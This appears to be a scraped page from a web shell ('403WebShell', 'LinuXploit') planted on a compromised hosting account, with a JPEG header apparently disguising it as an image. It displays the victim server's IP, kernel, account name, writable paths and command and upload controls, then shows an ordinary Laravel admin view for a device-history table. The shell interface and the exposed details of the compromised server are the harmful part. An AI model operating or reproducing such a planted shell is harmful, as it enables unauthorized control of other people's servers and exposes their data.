����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.21.126.72
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/gle.gltechlimited.com/resources/views/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/gle.gltechlimited.com/resources/views/admin/device-history.blade.php
@extends('layouts.master')
@section('title',__('Device History'))
@section('breadcum')
	<div class="breadcrumbbar">
    <h4 class="page-title">{{ __('Device History') }}</h4>
    <div class="breadcrumb-list">
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="{{url('/admin')}}" title="{{ __('Dashboard') }}">{{ __('Dashboard') }}</a></li>
          <li class="breadcrumb-item active" aria-current="page">{{ __('Device History') }}</li>
        </ol>
    </div> 
  </div>
@endsection
@section('maincontent')
<div class="contentbar"> 
  <div class="row"> 
    <div class="col-md-12">
      <div class="card m-b-50">
        <div class="card-body device-history-page">
          <div class="table-responsive">
            <table id="devicetable" class="table table-borderd">
              <thead>
                <th> {{ __('#') }}</th>
                <th>{{ __("User Name")}}</th>
                <th>{{ __("IP Address") }}</th>
                <th>{{ __("Platform") }}</th>
                <th>{{ __("Browser") }}</th>
                <th>{{ __("Logged In") }}</th>
                <th>{{ __("Logged Out") }}</th>
              </thead>
              <tbody>              
              </tbody>
            </table>                  
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
@endsection  
@section('script')
   
<script>
  $(function () {
    jQuery.noConflict();
    var table;
    if($.fn.dataTable.isDataTable('#devicetable')){
      var table = $('#devicetable').DataTable();
    }else{
      table = $('#devicetable').DataTable({
        processing: true,
        serverSide: true,
        responsive: true,
        autoWidth: false,
        scrollCollapse: true,
      
        
        ajax: "{{ route('device_history') }}",
        columns: [
              {
                  data: 'DT_RowIndex',
                  name: 'DT_RowIndex',
                  searchable: false,
                  orderable: false
              },
              {
                  data: 'username',
                  name: 'users.name'
              },
              {
                  data: 'ip_address',
                  name: 'auth_log.ip_address'
              },
              {
                  data: 'platform',
                  name: 'auth_log.platform'
              },
              {
                  data: 'browser',
                  name: 'auth_log.browser'
              },
              {
                  data: 'login_at',
                  name: 'auth_log.login_at'
              },
              {
                  data: 'logout_at',
                  name: 'auth_log.logout_at'
              }
        ],
        dom : 'lBfrtip',
        buttons : [
          'csv','excel','pdf','print'
        ],
        order : [[0,'desc']]
      });
    }
      
    
  });
</script>
<script>
  $(function(){
    $('#checkboxAll').on('change', function(){
      if($(this).prop("checked") == true){
        $('.material-checkbox-input').attr('checked', true);
      }
      else if($(this).prop("checked") == false){
        $('.material-checkbox-input').attr('checked', false);
      }
    });
  });
  
</script>

@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit